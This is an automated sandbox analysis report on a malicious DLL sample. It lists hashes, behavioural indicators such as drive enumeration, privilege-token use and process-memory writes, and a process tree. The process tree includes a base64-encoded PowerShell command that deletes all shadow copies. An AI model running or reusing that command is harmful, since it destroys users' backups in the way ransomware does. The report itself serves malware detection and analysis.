Analysis
-
max time kernel
118s -
max time network
136s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:50
Static task
static1
Behavioral task
behavioral1
Sample
e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll
Resource
win10-en-20211208
General
-
Target
e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll
-
Size
166KB
-
MD5
3c21e050abbd6da896d238b7bd126523
-
SHA1
b90139797ae74d60bc4b7e184383d4beb60c685d
-
SHA256
e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3
-
SHA512
7d763a1a441958670c5b5e0ca0d18d1f70926cdfcaabaf41857663ce94e5e0e141ce538a0a3bb080edb5fd9f0ffccd6dccf9cdcd3891dbe76b6029b7fc384cf8
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Y: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 1716 rundll32.exe 576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1716 rundll32.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeBackupPrivilege 1788 vssvc.exe Token: SeRestorePrivilege 1788 vssvc.exe Token: SeAuditPrivilege 1788 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1908 wrote to memory of 1716 1908 rundll32.exe rundll32.exe PID 1716 wrote to memory of 576 1716 rundll32.exe powershell.exe PID 1716 wrote to memory of 576 1716 rundll32.exe powershell.exe PID 1716 wrote to memory of 576 1716 rundll32.exe powershell.exe PID 1716 wrote to memory of 576 1716 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\e2a240bd670e9dd1374471eca22fff783aa9617ce7514b7b55be4ae4be4c30b3.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1004
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/576-56-0x000007FEFBE21000-0x000007FEFBE23000-memory.dmpFilesize
8KB
-
memory/576-58-0x00000000023B0000-0x00000000023B2000-memory.dmpFilesize
8KB
-
memory/576-59-0x00000000023B2000-0x00000000023B4000-memory.dmpFilesize
8KB
-
memory/576-60-0x00000000023B4000-0x00000000023B7000-memory.dmpFilesize
12KB
-
memory/576-57-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmpFilesize
11.4MB
-
memory/576-61-0x00000000023BB000-0x00000000023DA000-memory.dmpFilesize
124KB
-
memory/1716-55-0x0000000076731000-0x0000000076733000-memory.dmpFilesize
8KB